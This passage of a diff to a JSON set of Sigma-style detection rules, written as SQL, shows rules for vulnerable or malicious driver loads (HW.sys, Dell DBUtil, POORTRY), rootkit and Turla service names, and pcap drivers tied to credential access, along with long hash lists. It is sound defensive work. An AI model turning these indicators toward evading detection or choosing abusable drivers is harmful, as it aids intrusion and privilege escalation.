'0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', 'c0d88db11d0f529754d290ed5f4c34b4dba8c4f2e5c4148866daabeab0d25f9c', '7e0124fcc7c95fdc34408cf154cb41e654dade8b898c71ad587b2090b1da30d7', '61a1bdddd3c512e681818debb5bee94db701768fc25e674fcad46592a3259bd0', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '45abdbcd4c0916b7d9faaf1cd08543a3a5178871074628e0126a6eda890d26e0', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', '1e8b0c1966e566a523d652e00f7727d8b0663f1dfdce3b9a09b9adfaef48d8ee', 'e7af7bcb86bd6bab1835f610671c3921441965a839673ac34444cf0ce7b2164e', '93d873cdf23d5edc622b74f9544cac7fe247d7a68e1e2a7bf2879fad97a3ae63', 'a9706e320179993dade519a83061477ace195daa1b788662825484813001f526', '61d6e40601fa368800980801a662a5b3b36e3c23296e8ae1c85726a56ef18cc8', '47eaebc920ccf99e09fc9924feb6b19b8a28589f52783327067c9b09754b5e84', 'fd8669794c67b396c12fc5f08e9c004fdf851a82faf302846878173e4fbecb03', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', '07b6d69bafcfd767f1b63a490a8843c3bb1f8e1bbea56176109b5743c8f7d357', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', '99f4994a0e5bd1bf6e3f637d3225c69ff4cd620557e23637533e7f18d7d6cba1', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', 'ece0a900ea089e730741499614c0917432246ceb5e11599ee3a1bb679e24fd2c', '8ef0ad86500094e8fa3d9e7d53163aa6feef67c09575c169873c494ed66f057f', '36b9e31240ab0341873c7092b63e2e0f2cab2962ebf9b25271c3a1216b7669eb', '6b830ea0db6546a044c9900d3f335e7820c2a80e147b0751641899d1a5aa8f74', '9c10e2ec4f9ef591415f9a784b93dc9c9cdafa7c69602c0dc860c5b62222e449', '5b9623da9ba8e5c80c49473f40ffe7ad315dcadffc3230afdc9d9226d60a715a', 'fafa1bb36f0ac34b762a10e9f327dcab2152a6d0b16a19697362d49a31e7f566', 'e61a54f6d3869b43c4eceac3016df73df67cce03878c5a6167166601c5d3f028', 'f88ebb633406a086d9cca6bc8b66a4ea940c5476529f9033a9e0463512a23a57', '2aa1b08f47fbb1e2bd2e4a492f5d616968e703e1359a921f62b38b8e4662f0c4', '06508aacb4ed0a1398a2b0da5fa2dbf7da435b56da76fd83c759a50a51c75caf', 'cc383ad11e9d06047a1558ed343f389492da3ac2b84b71462aee502a2fa616c8', '845f1e228de249fc1ddf8dc28c39d03e8ad328a6277b6502d3932e83b879a65a', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', '64f9e664bc6d4b8f5f68616dd50ae819c3e60452efd5e589d6604b9356841b57', '2a652de6b680d5ad92376ad323021850dab2c653abf06edf26120f7714b8e08a', '85866e8c25d82c1ec91d7a8076c7d073cccf421cf57d9c83d80d63943a4edd94', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', 'bb50818a07b0eb1bd317467139b7eb4bad6cd89053fecdabfeae111689825955', '9bb09752cf3a464455422909edef518ac18fe63cf5e1e8d9d6c2e68db62e0c87', 'b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '1c8dfa14888bb58848b4792fb1d8a921976a9463be8334cff45cc96f1276049a', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', '5c1585b1a1c956c7755429544f3596515dfdf928373620c51b0606a520c6245a', 'f40435488389b4fb3b945ca21a8325a51e1b5f80f045ab019748d0ec66056a8b', '405472a8f9400a54bb29d03b436ccd58cfd6442fe686f6d2ed4f63f002854659', '3a95cc82173032b82a0ffc7d2e438df64c13bc16b4574214c9fe3be37250925e', '42579a759f3f95f20a2c51d5ac2047a2662a2675b3fb9f46c1ed7f23393a0f00', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '159e7c5a12157af92e0d14a0d3ea116f91c09e21a9831486e6dc592c93c10980', '5c04c274a708c9a7d993e33be3ea9e6119dc29527a767410dbaf93996f87369a', 'fcdfe570e6dc6e768ef75138033d9961f78045adca53beb6fdb520f6417e0df1', 'cb57f3a7fe9e1f8e63332c563b0a319b26c944be839eabc03e9a3277756ba612', '4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6', '80cbba9f404df3e642f22c476664d63d7c229d45d34f5cd0e19c65eb41becec3', '29e0062a017a93b2f2f5207a608a96df4d554c5de976bd0276c2590a03bd3e94', 'db90e554ad249c2bd888282ecf7d8da4d1538dd364129a3327b54f8242dd5653', '8dafe5f3d0527b66f6857559e3c81872699003e0f2ffda9202a1b5e29db2002e', '101402d4f5d1ae413ded499c78a5fcbbc7e3bae9b000d64c1dd64e3c48c37558', '6ed35f310c96920a271c59a097b382da07856e40179c2a4239f8daa04eef38e7', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '37dde6bd8a7a36111c3ac57e0ac20bbb93ce3374d0852bcacc9a2c8c8c30079e', '5d530e111400785d183057113d70623e17af32931668ab7c7fc826f0fd4f91a3', 'd7bc7306cb489fe4c285bbeddc6d1a09e814ef55cf30bd5b8daf87a52396f102', '7049f3c939efe76a5556c2a2c04386db51daf61d56b679f4868bb0983c996ebb', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '3243aab18e273a9b9c4280a57aecef278e10bfff19abb260d7a7820e41739099', '0040153302b88bee27eb4f1eca6855039e1a057370f5e8c615724fa5215bada3', 'f0605dda1def240dc7e14efa73927d6c6d89988c01ea8647b671667b2b167008', 'b1334a71cc73b3d0c54f62d8011bec330dfc355a239bf94a121f6e4c86a30a2e', '74a846c61adc53692d3040aff4c1916f32987ad72b07fe226e9e7dbeff1036c4', '7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6', 'c1c4310e5d467d24e864177bdbfc57cb5d29aac697481bfa9c11ddbeebfd4cc8', '22418016e980e0a4a2d01ca210a17059916a4208352c1018b0079ccb19aaf86a', '76b86543ce05540048f954fed37bdda66360c4a3ddb8328213d5aef7a960c184', 'dd4a1253d47de14ef83f1bc8b40816a86ccf90d1e624c5adf9203ae9d51d4097', '025e7be9fcefd6a83f4471bba0c11f1c11bd5047047d26626da24ee9a419cdc4', '50d5eaa168c077ce5b7f15b3f2c43bd2b86b07b1e926c1b332f8cb13bd2e0793', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '749b0e8c8c8b7dda8c2063c708047cfe95afa0a4d86886b31a12f3018396e67c', 'd8459f7d707c635e2c04d6d6d47b63f73ba3f6629702c7a6e0df0462f6478ae2', '49f75746eebe14e5db11706b3e58accc62d4034d2f1c05c681ecef5d1ad933ba', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', 'ae79e760c739d6214c1e314728a78a6cb6060cce206fde2440a69735d639a0a2', '4422851a0a102f654e95d3b79c357ae3af1b096d7d1576663c027cfbc04abaf9', '84df20b1d9d87e305c92e5ffae21b10b325609d59d835a954dbd8750ef5dabf4', '7a7e8df7173387aec593e4fe2b45520ea3156c5f810d2bb1b2784efd1c922376', 'cd4a249c3ef65af285d0f8f30a8a96e83688486aab515836318a2559757a89bb', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '47f0cdaa2359a63ad1389ef4a635f1f6eee1f63bdf6ef177f114bdcdadc2e005', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1', '8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce', '36875562e747136313ec5db58174e5fab870997a054ca8d3987d181599c7db6a', '7877c1b0e7429453b750218ca491c2825dae684ad9616642eff7b41715c70aca', '591bd5e92dfa0117b3daa29750e73e2db25baa717c31217539d30ffb1f7f3a52', '04a85e359525d662338cae86c1e59b1d7aa9bd12b920e8067503723dc1e03162', '4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', 'e81230217988f3e7ec6f89a06d231ec66039bdba340fd8ebb2bbb586506e3293', '49c827cf48efb122a9d6fd87b426482b7496ccd4a2dbca31ebbf6b2b80c98530', 'd8b58f6a89a7618558e37afc360cd772b6731e3ba367f8d58734ecee2244a530', '7ec93f34eb323823eb199fbf8d06219086d517d0e8f4b9e348d7afd41ec9fd5d', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '89b0017bc30cc026e32b758c66a1af88bd54c6a78e11ec2908ff854e00ac46be', 'e005e8d183e853a27ad3bb56f25489f369c11b0d47e3d4095aad9291b3343bf1', '5f5e5f1c93d961985624768b7c676d488c7c7c1d4c043f6fc1ea1904fefb75be', 'cdd2a4575a46bada4837a6153a79c14d60ee3129830717ef09e0e3efd9d00812', 'ac3f613d457fc4d44fa27b2e0b1baa62c09415705efb5a40a4756da39b3ac165', '475e5016c9c0f5a127896f9179a1b1577a67b357f399ab5a1e68aab07134729a', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '0de4247e72d378713bcf22d5c5d3874d079203bb4364e25f67a90d5570bdcce8', '72b99147839bcfb062d29014ec09fe20a8f261748b5925b00171ef3cb849a4c1', 'cc586254e9e89e88334adee44e332166119307e79c2f18f6c2ab90ce8ba7fc9b', 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe', '5ee292b605cd3751a24e5949aae615d472a3c72688632c3040dc311055b75a92', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', 'f8886a9c759e0426e08d55e410b02c5b05af3c287b15970175e4874316ffaf13', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', '2da330a2088409efc351118445a824f11edbe51cf3d653b298053785097fe40e', '54841d9f89e195196e65aa881834804fe3678f1cf6b328cab8703edd15e3ec57', 'e6a7b0bc01a627a7d0ffb07faddb3a4dd96b6f5208ac26107bdaeb3ab1ec8217', 'cf4b5fa853ce809f1924df3a3ae3c4e191878c4ea5248d8785dc7e51807a512b', '6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1', '708016fbe22c813a251098f8f992b177b476bd1bbc48c2ed4a122ff74910a965', '362c4f3dadc9c393682664a139d65d80e32caa2a97b6e0361dfd713a73267ecc', '08eb2d2aa25c5f0af4e72a7e0126735536f6c2c05e9c7437282171afe5e322c6', '2d83ccb1ad9839c9f5b3f10b1f856177df1594c66cbbc7661677d4b462ebf44d', 'c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c', '4941c4298f4560fc1e59d0f16f84bab5c060793700b82be2fd7c63735f1657a8', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', '76fb4deaee57ef30e56c382c92abffe2cf616d08dbecb3368c8ee6b02e59f303', '3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25', '7196187fb1ef8d108b380d37b2af8efdeb3ca1f6eefd37b5dc114c609147216d', 'f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', 'b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3', 'fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8', 'd5586dc1e61796a9ae5e5d1ced397874753056c3df2eb963a8916287e1929a71', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', '6cb51ae871fbd5d07c5aad6ff8eea43d34063089528603ca9ceb8b4f52f68ddc', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2', 'dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc', '6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421', 'e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa', '0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff', '3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c', '7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f', '9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395', 'aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79', '146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88', '9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b', 'cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', '436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7', 'b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf', 'b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469', '4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7', 'af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685', 'b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d', 'ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41', '06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4', '4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', '4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe', '38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a', '56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7', '455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b', 'e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', 'b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414', 'dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22', '221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', '78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f', '7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457', 'd5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3', 'fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533', 'f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', 'dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8', '21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21', '91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c', '98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8', 'd25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26', '6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4', '3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5', '8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f', '3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', 'b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a', '3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499', '509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', '09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1', '1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b')))" ], - "filename": "win_system_vul_cve_2020_1472.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", - "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "status": "experimental", + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" ], - "filename": "win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_vuln_hw_driver.yml" }, { - "title": "Windows Pcap Drivers", - "id": "7b687634-ab20-11ea-bb37-0242ac130002", + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "status": "test", - "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", - "author": "Cian Heasley", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "There is a relevant set of false positives depending on applications in the environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "win_system_pcap_drivers.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - "title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": "driver_load_win_powershell_script_installed_as_service.yml" }, { - "title": "Potential RDP Exploit CVE-2019-0708", - "id": "aaa5b30d-f418-420b-83a0-299cb6024885", - "status": "test", - "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", - "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "status": "experimental", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Bad connections or network interruptions" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE 